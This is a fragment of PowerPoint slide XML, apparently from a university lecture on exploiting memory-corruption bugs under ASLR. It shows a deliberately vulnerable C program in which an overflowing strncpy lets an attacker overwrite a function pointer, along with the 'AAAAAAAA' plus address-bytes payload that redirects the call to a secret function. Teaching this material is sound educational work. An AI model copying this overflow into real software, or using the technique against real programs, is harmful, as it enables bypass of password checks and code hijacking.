                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>\x04\x85\x04\x08</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="762000"/>
            <a:ext cx="2286000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -21283"/>
              <a:gd name="adj2" fmla="val 68561"/>
              <a:gd name="adj3" fmla="val 16667"/>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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.text not randomized</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2186241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P spid="2" grpId="0" animBg="1"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Pointer Subterfuge </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="1600200"/>
            <a:ext cx="3581400" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Overwrite a function pointer to point to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>program function (similar to ret2text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>another lib function in Procedure Linkage Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="1771059"/>
            <a:ext cx="4499699" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>please</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> call me!*/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> secret(char *input) { … }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>chk_pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>intput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) { … }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)(char *input);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>chk_pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1], 12);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("[] Hello %s!\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="984807"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="984807"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="984807"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="984807"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="984807"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41575737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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Pointers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32770" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32771" name="Picture 3" descr="funcptr.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7725" y="1687513"/>
            <a:ext cx="403225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5" descr="Screen shot 2010-03-01 at 12.50.14 P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51438" y="4514850"/>
            <a:ext cx="29845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6" descr="Screen shot 2010-03-01 at 12.50.47 PM.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151438" y="2149475"/>
            <a:ext cx="33782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Rounded Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5162550" y="2160588"/>
            <a:ext cx="1582738" cy="327025"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="30196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="20000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="37999"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093073" y="3577052"/>
            <a:ext cx="2161964" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>\x04\x85\x04\x08</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="556658" y="4634812"/>
            <a:ext cx="1710725" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-150" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAAAAA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="-150" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="620953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7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animBg="1"/>
      <p:bldP spid="9" grpId="0"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a:xfrm>
            <a:off x="457200" y="266700"/>
            <a:ext cx="8229600" cy="879475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>How to attack with ASLR?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="487363" y="1474788"/>
            <a:ext cx="8229600" cy="3554412"/>
            <a:chOff x="487363" y="1474788"/>
            <a:chExt cx="8229600" cy="3554412"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487363" y="1474788"/>
              <a:ext cx="8229600" cy="709612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B64926"/>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600" b="1" dirty="0"/>
